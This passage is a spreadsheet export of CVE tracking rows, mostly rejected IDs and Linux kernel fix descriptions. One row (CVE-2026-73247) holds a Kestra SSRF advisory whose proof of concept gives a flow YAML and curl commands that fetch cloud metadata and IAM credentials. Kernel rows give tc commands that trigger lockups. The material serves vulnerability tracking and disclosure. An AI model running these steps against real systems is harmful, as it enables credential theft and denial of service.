          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B408" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C408" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-53679</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2026-09-17</t>
        </is>
      </c>
      <c r="P408" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q408" s="5" t="inlineStr"/>
      <c r="R408" s="5" t="inlineStr"/>
      <c r="S408" s="5" t="inlineStr">
        <is>
          <t>Rejected reason: Red Hat Product Security has come to the conclusion that this CVE is not needed.</t>
        </is>
      </c>
      <c r="T408" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-53679</t>
        </is>
      </c>
    </row>
    <row r="409">
      <c r="A409" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B409" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C409" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-53681</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2026-09-17</t>
        </is>
      </c>
      <c r="P409" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q409" s="5" t="inlineStr"/>
      <c r="R409" s="5" t="inlineStr"/>
      <c r="S409" s="5" t="inlineStr">
        <is>
          <t>Rejected reason: Red Hat Product Security has come to the conclusion that this CVE is not needed.</t>
        </is>
      </c>
      <c r="T409" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-53681</t>
        </is>
      </c>
    </row>
    <row r="410">
      <c r="A410" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B410" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C410" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-57846</t>
        </is>
      </c>
      <c r="D410" s="5" t="inlineStr"/>
      <c r="E410" s="5" t="inlineStr"/>
      <c r="F410" s="5" t="inlineStr"/>
      <c r="G410" s="5" t="inlineStr"/>
      <c r="H410" s="5" t="inlineStr"/>
      <c r="I410" s="5" t="inlineStr"/>
      <c r="J410" s="5" t="inlineStr"/>
      <c r="K410" s="5" t="inlineStr"/>
      <c r="L410" s="5" t="inlineStr"/>
      <c r="M410" s="5" t="inlineStr"/>
      <c r="N410" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O410" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P410" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q410" s="5" t="inlineStr"/>
      <c r="R410" s="5" t="inlineStr"/>
      <c r="S410" s="5" t="inlineStr">
        <is>
          <t>Rejected reason: This CVE ID has been rejected or withdrawn by its CVE Numbering Authority.</t>
        </is>
      </c>
      <c r="T410" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-57846</t>
        </is>
      </c>
    </row>
    <row r="411">
      <c r="A411" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B411" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C411" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-57847</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2026-09-17</t>
        </is>
      </c>
      <c r="P411" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q411" s="5" t="inlineStr"/>
      <c r="R411" s="5" t="inlineStr"/>
      <c r="S411" s="5" t="inlineStr">
        <is>
          <t>Rejected reason: This CVE ID has been rejected or withdrawn by its CVE Numbering Authority.</t>
        </is>
      </c>
      <c r="T411" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-57847</t>
        </is>
      </c>
    </row>
    <row r="412">
      <c r="A412" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B412" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C412" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-65323</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2026-09-17</t>
        </is>
      </c>
      <c r="P412" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q412" s="5" t="inlineStr"/>
      <c r="R412" s="5" t="inlineStr"/>
      <c r="S412" s="5" t="inlineStr">
        <is>
          <t>Rejected reason: This CVE ID has been rejected or withdrawn by its CVE Numbering Authority.</t>
        </is>
      </c>
      <c r="T412" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-65323</t>
        </is>
      </c>
    </row>
    <row r="413">
      <c r="A413" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B413" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C413" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-73245</t>
        </is>
      </c>
      <c r="D413" s="5" t="inlineStr"/>
      <c r="E413" s="5" t="inlineStr">
        <is>
          <t>MODERATE</t>
        </is>
      </c>
      <c r="F413" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="G413" s="5" t="inlineStr"/>
      <c r="H413" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I413" s="5" t="inlineStr"/>
      <c r="J413" s="5" t="inlineStr"/>
      <c r="K413" s="5" t="inlineStr"/>
      <c r="L413" s="5" t="inlineStr">
        <is>
          <t>Maven:io.kestra:kestra</t>
        </is>
      </c>
      <c r="M413" s="5" t="inlineStr">
        <is>
          <t>2.0.0</t>
        </is>
      </c>
      <c r="N413" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O413" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P413" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q413" s="5" t="inlineStr"/>
      <c r="R413" s="5" t="inlineStr"/>
      <c r="S413" s="5" t="inlineStr">
        <is>
          <t>## Summary
Kestra's Micronaut **management endpoints are served on port 8081 with no authentication**, even when the main API (port 8080) has basic-auth enabled. Anyone who can reach `:8081` can read `GET /env` (full resolved environment/configuration) and mutate runtime state via `POST /loggers/{name}` (change log levels), among the other management endpoints. Enabling basic-auth creates a false sense of protection because the auth filter only covers `/api/v1/**` on 8080 and never applies to the 8081 management port. The shipped repository contains no statement that 8081 is management-only / must-not-be-exposed, and the vendor's reference `docker-compose.yml` publishes it with no warning.
## Affected
- Product: Kestra (`kestra-io/kestra`), an open-source orchestration/data-pipeline platform (Java / Micronaut).
- Version: **v1.3.29** (confirmed); the management-port exposure is an insecure default of the shipped configuration.
- No fix at time of report.
## Technical detail
Kestra runs the Micronaut management/actuator endpoints on a separate HTTP port **8081**. The authentication filter (basic-auth, when configured) is scoped to the main API on port 8080 (`/api/v1/**`) and does not apply to 8081. As a result:
- `GET http://&lt;host&gt;:8081/env` returns the full resolved environment/configuration (property sources), unauthenticated.
- `POST http://&lt;host&gt;:8081/loggers/{name}` changes a logger's level at runtime, unauthenticated (a state-changing operation).
- The other Micronaut management endpoints on 8081 are similarly reachable.
The shipped `application.yml` comments, `SECURITY.md`, and the vendor's reference `docker-compose.yml` do not warn that 8081 must be kept internal, and the reference compose publishes 8081, so a deployment that enables basic-auth on the API still exposes the management port with no auth.
## Impact
An unauthenticated network client that can reach port 8081 can read the full application configuration/environment (`/env`) and change runtime logging (`/loggers`), and reach the other management endpoints — an authentication-bypass on the management surface. (Sensitive credential values in `/env` are masked, so this is scored without a full-secret-read confidentiality impact.)
## Proof of concept
Reproduced live on Kestra v1.3.29 with basic-auth enabled on the main API. Unauthenticated `GET http://&lt;host&gt;:8081/env` returned `200` with the resolved configuration/property sources, and `POST http://&lt;host&gt;:8081/loggers/{name}` returned `200` and changed the logger level — both with no credentials. The equivalent main-API request on 8080 returned `401` (control), confirming the auth filter covers only the API port and not the 8081 management port. (Credential values in `/env` were masked.)
Full request/response captures available on request.
## Remediation
Apply authentication to the management port (bind the Micronaut management endpoints behind the same auth as the API, or require a separate management credential), and by default bind port 8081 to loopback only. At minimum, document prominently (SECURITY.md, application.yml, the reference docker-compose) that port 8081 must never be exposed to untrusted networks, and do not publish 8081 in the reference compose.
## Credit
Reported by **Santosh Kumar Puppala** (GitHub: https://github.com/Santoshkumarpuppala).</t>
        </is>
      </c>
      <c r="T413" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-73245</t>
        </is>
      </c>
    </row>
    <row r="414">
      <c r="A414" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B414" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C414" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-73247</t>
        </is>
      </c>
      <c r="D414" s="5" t="inlineStr"/>
      <c r="E414" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F414" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="G414" s="5" t="inlineStr"/>
      <c r="H414" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="I414" s="5" t="inlineStr"/>
      <c r="J414" s="5" t="inlineStr"/>
      <c r="K414" s="5" t="inlineStr"/>
      <c r="L414" s="5" t="inlineStr">
        <is>
          <t>Maven:io.kestra:core, Maven:io.kestra:kestra-core</t>
        </is>
      </c>
      <c r="M414" s="5" t="inlineStr">
        <is>
          <t>2.0.0</t>
        </is>
      </c>
      <c r="N414" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O414" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P414" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q414" s="5" t="inlineStr"/>
      <c r="R414" s="5" t="inlineStr"/>
      <c r="S414" s="5" t="inlineStr">
        <is>
          <t>### Summary
The Pebble template engine's `http()` function in Kestra OSS accepts user-controlled URLs without any validation, allowing Server-Side Request Forgery (SSRF) attacks. An unauthenticated attacker can import a malicious Flow YAML and execute it to access internal services, cloud metadata endpoints (AWS 169.254.169.254), or localhost services. The vulnerability affects all Kestra OSS deployments with default configuration.
### Details
The root cause is in `core/src/main/java/io/kestra/core/runners/pebble/functions/HttpFunction.java` (lines 77-106):
1. **No URL validation**: User input is passed directly to `URI.create()` with no checks for private IPs, internal hosts, or restricted schemes
2. **No IP filtering**: Missing checks for 10.0.0.0/8, 192.168.0.0/16, 169.254.169.254, 127.0.0.1
3. **No scheme restriction**: `file://`, `gopher://` schemes are not blocked
4. **No authentication required**: `TenantValidationFilter.java` only checks tenant == "main" — no authentication
5. **Unconditional registration**: `HttpFunction` is registered without any feature flags in `Extension.java:180`
### PoC
**Prerequisites:**
```bash
docker run -d --name kestra-ssrf -p 8080:8080 kestra/kestra:latest server local
sleep 30
```
**Step 1: Create malicious Flow YAML**
```yaml
cat &gt; /tmp/ssrf_poc.yaml &lt;&lt; 'YAML'
id: ssrf_metadata
namespace: company.team
tasks:
  - id: exfiltrate
    type: io.kestra.plugin.core.log.Log
    message: |
      {{ http(uri='http://169.254.169.254/latest/meta-data/', method='GET') }}
YAML
```
**Step 2: Import without authentication**
```bash
curl -X POST http://localhost:8080/api/v1/main/flows/import \
  -F "fileUpload=@/tmp/ssrf_poc.yaml"
```
**Step 3: Execute the flow**
```bash
curl -X POST http://localhost:8080/api/v1/main/executions/company.team/ssrf_metadata
```
**Step 4: Verify** — the flow execution output contains AWS EC2 metadata (ami-id, instance-type, IAM credentials if available)
### Impact
- **CVSS 3.1**: 8.6 (HIGH) — AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N
- **CWE**: CWE-918 (Server-Side Request Forgery)
- **Affected**: All Kestra OSS versions (default deployment)
- **Impact**: Attackers can access internal services, cloud metadata (AWS/GCP/Azure), localhost endpoints, and potentially escalate to cloud credential theft</t>
        </is>
      </c>
      <c r="T414" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-73247</t>
        </is>
      </c>
    </row>
    <row r="415">
      <c r="A415" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B415" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C415" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-73638</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2026-09-17</t>
        </is>
      </c>
      <c r="P415" s="5" t="inlineStr">
        <is>
          <t>2026-09-18</t>
        </is>
      </c>
      <c r="Q415" s="5" t="inlineStr"/>
      <c r="R415" s="5" t="inlineStr">
        <is>
          <t>CWE-125</t>
        </is>
      </c>
      <c r="S415" s="5" t="inlineStr">
        <is>
          <t>Imager versions from 0.45_02 before 1.035 for Perl read outside the EXIF block via unchecked start offsets in tiff_load_ifd.
tiff_load_ifd() validates an IFD entry's data by checking that `entry-&gt;offset + entry-&gt;size` stays within the EXIF block, and never checks the start offset itself. Where that sum is not the real end of the data, the check passes with the entry starting outside the block.
Through 1.032 `entry-&gt;offset` is a plain int, so on the usual two's-complement implementations an offset with the high bit set converts to negative and the sum can land back inside the block. From 1.033 the field is a size_t and the addition wraps only where size_t is 32 bits. The IFD's own start offset is checked the same way and wraps where unsigned long is 32 bits, which includes 64-bit Windows.
Any caller of Imager-&gt;read() on an attacker-supplied image may receive EXIF tags holding bytes from outside the block, or crash the process.</t>
        </is>
      </c>
      <c r="T415" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-73638</t>
        </is>
      </c>
    </row>
    <row r="416">
      <c r="A416" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B416" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C416" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-73639</t>
        </is>
      </c>
      <c r="D416" s="5" t="inlineStr"/>
      <c r="E416" s="5" t="inlineStr"/>
      <c r="F416" s="5" t="inlineStr"/>
      <c r="G416" s="5" t="inlineStr"/>
      <c r="H416" s="5" t="inlineStr"/>
      <c r="I416" s="5" t="inlineStr"/>
      <c r="J416" s="5" t="inlineStr"/>
      <c r="K416" s="5" t="inlineStr"/>
      <c r="L416" s="5" t="inlineStr"/>
      <c r="M416" s="5" t="inlineStr"/>
      <c r="N416" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O416" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P416" s="5" t="inlineStr">
        <is>
          <t>2026-09-18</t>
        </is>
      </c>
      <c r="Q416" s="5" t="inlineStr"/>
      <c r="R416" s="5" t="inlineStr">
        <is>
          <t>CWE-787</t>
        </is>
      </c>
      <c r="S416" s="5" t="inlineStr">
        <is>
          <t>Imager::File::PNG versions from 1.003 before 1.004 for Perl write past the end of the row buffer reading a PNG with a tRNS transparency chunk in read_direct8.
With a tRNS chunk, read_direct8() adds an alpha channel to the image it creates but still sizes the row buffer from the original channel count. libpng expands the transparency into that extra channel, so png_read_row() fills one channel more than the buffer holds, at one byte per sample, and writes width bytes past the end of the allocation. Palette images go to read_paletted() and 16-bit images to read_direct16(), which sizes its buffer from png_get_rowbytes() and allocates enough for the expanded row.
The same reader ships bundled in the Imager distribution.
Reading an attacker-supplied PNG through Imager-&gt;read() corrupts the heap, which can crash the process.</t>
        </is>
      </c>
      <c r="T416" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-73639</t>
        </is>
      </c>
    </row>
    <row r="417">
      <c r="A417" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B417" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C417" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-78668</t>
        </is>
      </c>
      <c r="D417" s="5" t="inlineStr"/>
      <c r="E417" s="5" t="inlineStr"/>
      <c r="F417" s="5" t="inlineStr"/>
      <c r="G417" s="5" t="inlineStr"/>
      <c r="H417" s="5" t="inlineStr"/>
      <c r="I417" s="5" t="inlineStr"/>
      <c r="J417" s="5" t="inlineStr"/>
      <c r="K417" s="5" t="inlineStr"/>
      <c r="L417" s="5" t="inlineStr"/>
      <c r="M417" s="5" t="inlineStr"/>
      <c r="N417" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O417" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P417" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q417" s="5" t="inlineStr"/>
      <c r="R417" s="5" t="inlineStr"/>
      <c r="S417" s="5" t="inlineStr">
        <is>
          <t>Rejected reason: reserved but not needed</t>
        </is>
      </c>
      <c r="T417" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-78668</t>
        </is>
      </c>
    </row>
    <row r="418">
      <c r="A418" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B418" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C418" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-90050</t>
        </is>
      </c>
      <c r="D418" s="5" t="inlineStr"/>
      <c r="E418" s="5" t="inlineStr"/>
      <c r="F418" s="5" t="inlineStr"/>
      <c r="G418" s="5" t="inlineStr"/>
      <c r="H418" s="5" t="inlineStr"/>
      <c r="I418" s="5" t="inlineStr"/>
      <c r="J418" s="5" t="inlineStr"/>
      <c r="K418" s="5" t="inlineStr"/>
      <c r="L418" s="5" t="inlineStr"/>
      <c r="M418" s="5" t="inlineStr"/>
      <c r="N418" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O418" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P418" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q418" s="5" t="inlineStr"/>
      <c r="R418" s="5" t="inlineStr"/>
      <c r="S418" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
net/sched: fq: clamp quantum and initial_quantum in change path
The fq change path accepts TCA_FQ_QUANTUM in [1, INT_MAX] and
TCA_FQ_INITIAL_QUANTUM up to INT_MAX, while fq_init() already clamps to
[1, 1&lt;&lt;20]. A user can override the init clamp via tc qdisc change,
restoring the small-quantum deficit spin that the init clamp prevents.
Narrow iq_range.max to 1&lt;&lt;20 so TCA_FQ_INITIAL_QUANTUM is rejected at
parse time. Clamp TCA_FQ_QUANTUM to [256, 1&lt;&lt;20] in fq_change() and
fq_init() quantum to [256, 1&lt;&lt;20] for tiny-MTU devices.
Conditions to recreate the bug:
  CONFIG_NET_SCH_FQ=y. Requires CAP_NET_ADMIN (namespace-local via
  unshare -Urn suffices).
  tc qdisc add dev dummy0 root fq
  tc qdisc change dev dummy0 root fq quantum 1 stab data 32768 size_log 15 cell_log 0</t>
        </is>
      </c>
      <c r="T418" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-90050</t>
        </is>
      </c>
    </row>
    <row r="419">
      <c r="A419" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B419" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C419" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-90051</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2026-09-17</t>
        </is>
      </c>
      <c r="P419" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q419" s="5" t="inlineStr"/>
      <c r="R419" s="5" t="inlineStr"/>
      <c r="S419" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
tcp: reject non zerocopy devmem tx
Devmem tcp tx doesn't work without zero-copy, however it's not currently
enforced if NETIF_F_SG isn't present. In this case, tcp_sendmsg_locked()
will try the copy path and try to copy data from an iovec which consists
of offsets into the dma-buf and would normally fail. Moreover,
d9c56501c72fd ("net: tcp: block mixing readable and unreadable frags")
relies on that and assumes that the devmem binding is present IFF we're
using the zero-copy path, which can be used to mix net-iov and pages in
a single skb, and break invariants. Let's reject devmem tx without
zero-copy.
Note, the parameter check the patch is modifying is too loose, we can
create an io_uring request with dmabuf_id and all ZC flags, but which
won't have the binding. We replace it with stricter validation.</t>
        </is>
      </c>
      <c r="T419" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-90051</t>
        </is>
      </c>
    </row>
    <row r="420">
      <c r="A420" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B420" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C420" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-90052</t>
        </is>
      </c>
      <c r="D420" s="5" t="inlineStr"/>
      <c r="E420" s="5" t="inlineStr"/>
      <c r="F420" s="5" t="inlineStr"/>
      <c r="G420" s="5" t="inlineStr"/>
      <c r="H420" s="5" t="inlineStr"/>
      <c r="I420" s="5" t="inlineStr"/>
      <c r="J420" s="5" t="inlineStr"/>
      <c r="K420" s="5" t="inlineStr"/>
      <c r="L420" s="5" t="inlineStr"/>
      <c r="M420" s="5" t="inlineStr"/>
      <c r="N420" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O420" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P420" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q420" s="5" t="inlineStr"/>
      <c r="R420" s="5" t="inlineStr"/>
      <c r="S420" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
dm-integrity: fix buffer overflow with keyed discard
Since commit 68c5c42567bc ("dm-integrity: replace forgeable discard
filler with a keyed sector marker"), integrity_metadata computes a
checksum for every discarded block into the "checksums" buffer.
integrity_sector_checksum always writes the whole digest. So if the tag
size is smaller than the digest size, the checksum of the last block
that fits into the buffer is written past the end of it. For example,
with hmac(sha256) and tag size 16, a 4MiB discard writes 16 bytes past
the kmalloc'ed page.
Fix this by subtracting extra_space from the buffer size when computing
max_blocks, like we do for writes.</t>
        </is>
      </c>
      <c r="T420" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-90052</t>
        </is>
      </c>
    </row>
    <row r="421">
      <c r="A421" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B421" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C421" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-90053</t>
        </is>
      </c>
      <c r="D421" s="5" t="inlineStr"/>
      <c r="E421" s="5" t="inlineStr"/>
      <c r="F421" s="5" t="inlineStr"/>
      <c r="G421" s="5" t="inlineStr"/>
      <c r="H421" s="5" t="inlineStr"/>
      <c r="I421" s="5" t="inlineStr"/>
      <c r="J421" s="5" t="inlineStr"/>
      <c r="K421" s="5" t="inlineStr"/>
      <c r="L421" s="5" t="inlineStr"/>
      <c r="M421" s="5" t="inlineStr"/>
      <c r="N421" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O421" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P421" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q421" s="5" t="inlineStr"/>
      <c r="R421" s="5" t="inlineStr"/>
      <c r="S421" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
net/sched: sch_htb: limit htb_classify inner-class filter hops
htb_classify() follows each filter-selected inner class by switching
to cl-&gt;filter_list, but never bounds the number of hops. A filter on
an inner class can point back to itself or to another inner class that
points back, creating an infinite loop in the packet classification
path with the qdisc lock held and BH disabled — a soft lockup / panic
from a single packet.
Bound the traversal with a hop counter and drop the packet with a
rate-limited warning once the bound is exceeded. The counter is
incremented at the point the inner filter chain is picked up, after the
TC_ACT_* switch has consumed the classifier verdict, so a terminal
TC_ACT_QUEUED/STOLEN/TRAP on the last permitted chain still sets *qerr
to __NET_XMIT_STOLEN and the packet is not charged as a drop by this
qdisc or its parent.
The bound is TC_HTB_MAXDEPTH, taken from HTB's own parameters rather than
from the qdisc hierarchy depth limit. Class levels run from 0 to
TC_HTB_MAXDEPTH - 1, so a traversal that strictly descends in level can
take at most TC_HTB_MAXDEPTH hops. That descent is what a sane
configuration does, but it is assumed here rather than enforced:
htb_find() resolves a classid against every class in the qdisc, so a
filter may equally select a sibling or an ancestor. The normal
root -&gt; inner -&gt; leaf path takes a single hop, so the bound does not
affect legitimate classification.
htb_classify() can now return NULL irrespective of CONFIG_NET_CLS_ACT,
whereas previously every NULL return sat inside that ifdef. The NULL
handler in htb_enqueue() therefore cannot stay conditional either, so
drop the ifdef around it. This matches hfsc_enqueue(), which has always
handled a NULL class unconditionally. Without it, a kernel built
without actions would dereference a NULL class instead of dropping.
Conditions to recreate the bug:
- CONFIG_NET_SCHED, CONFIG_NET_SCH_HTB, CONFIG_NET_CLS_U32,
  CONFIG_LOCKUP_DETECTOR.
- Create an HTB qdisc on a device (e.g. lo), add an inner class
  1:1 with a leaf child 1:10, install a root u32 filter selecting
  1:1, and an inner-class u32 filter on 1:1 also selecting 1:1.
- Send one packet (ping). On the unfixed kernel the classify loop
  spins with the qdisc lock held; with softlockup_panic=1 it panics.
- Reachable from unprivileged user via unshare -Urn (CAP_NET_ADMIN).</t>
        </is>
      </c>
      <c r="T421" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-90053</t>
        </is>
      </c>
    </row>
    <row r="422">
      <c r="A422" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B422" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C422" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-90054</t>
        </is>
      </c>
      <c r="D422" s="5" t="inlineStr"/>
      <c r="E422" s="5" t="inlineStr"/>
      <c r="F422" s="5" t="inlineStr"/>
      <c r="G422" s="5" t="inlineStr"/>
      <c r="H422" s="5" t="inlineStr"/>
      <c r="I422" s="5" t="inlineStr"/>
      <c r="J422" s="5" t="inlineStr"/>
      <c r="K422" s="5" t="inlineStr"/>
      <c r="L422" s="5" t="inlineStr"/>
      <c r="M422" s="5" t="inlineStr"/>
      <c r="N422" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O422" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P422" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q422" s="5" t="inlineStr"/>
      <c r="R422" s="5" t="inlineStr"/>
      <c r="S422" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
tcp: fix corruption of urgent data on multi-segment retransmit
On the normal xmit path, while in urgent mode we refuse to build a
multi-segment TSO packet, so every segment gets its own urg_ptr:
	/* tcp_write_xmit() */
	limit = mss_now;
	if (tso_segs &gt; 1 &amp;&amp; !tcp_urg_mode(tp))
		limit = tcp_mss_split_point(...);
The retransmit path has no such guard. __tcp_retransmit_skb() builds a
segs &gt; 1 skb and hands it to the GSO layer, which only advances th-&gt;seq
per segment and copies urg_ptr verbatim:
	/* __tcp_retransmit_skb() */
	len = cur_mss * segs;		/* segs &gt; 1, no urg_mode check */
	...
	/* tcp_gso_segment(): bumps seq only, urg_ptr is copied */
urg_ptr is an offset from the segment's own seq, so a copied value points
at a different place on each segment. The receiver rebuilds the absolute
urgent seq as seg.seq + urg_ptr, so it walks a moving urgent point instead
of the one OOB byte:
	seg1  seq 1     urg_ptr 5001 -&gt; urgent @ 5001   (ok)
	seg2  seq 1001  urg_ptr 5001 -&gt; urgent @ 6001   (wrong, +MSS)
	seg3  seq 2001  urg_ptr 5001 -&gt; urgent @ 7001   (wrong, +2*MSS)
The real OOB byte is never pointed at, so the receiver stops splicing it
out and delivers it as normal in-band data, corrupting the stream.
Guard the retransmit length like the xmit path: keep segs = 1 while in
urgent mode.</t>
        </is>
      </c>
      <c r="T422" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-90054</t>
        </is>
      </c>
    </row>
    <row r="423">
      <c r="A423" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B423" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C423" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-90055</t>
        </is>
      </c>
      <c r="D423" s="5" t="inlineStr"/>
      <c r="E423" s="5" t="inlineStr"/>
      <c r="F423" s="5" t="inlineStr"/>
      <c r="G423" s="5" t="inlineStr"/>
      <c r="H423" s="5" t="inlineStr"/>
      <c r="I423" s="5" t="inlineStr"/>
      <c r="J423" s="5" t="inlineStr"/>
      <c r="K423" s="5" t="inlineStr"/>
